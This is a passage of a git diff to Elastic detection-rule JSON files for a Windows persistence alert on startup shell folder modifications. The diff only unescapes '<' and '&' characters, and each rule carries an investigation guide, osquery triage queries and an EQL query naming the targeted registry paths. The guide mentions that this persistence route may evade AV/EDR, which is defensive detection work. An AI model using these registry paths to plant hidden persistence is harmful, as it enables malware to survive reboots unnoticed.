process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_107.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_107.json index e90cf674060..8efd2b5ff7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_107.json +++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_107.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Startup Shell Folder Modification", - "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", "related_integrations": [ { @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_108.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_108.json index eb594904a6f..be46fd084cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_108.json +++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_108.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Startup Shell Folder Modification", - "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", "related_integrations": [ { @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_104.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_104.json index 0508e938bca..03210eebc2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_104.json @@ -61,7 +61,7 @@ ], "risk_score": 47, "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_105.json b/packages/security_detection_engine/kibana/security_rule/c8cccb06-faf2-4cd5-886e-2c9636cfcb87_105.json index 28ed06fc171..029b68eb9da 100644 --- 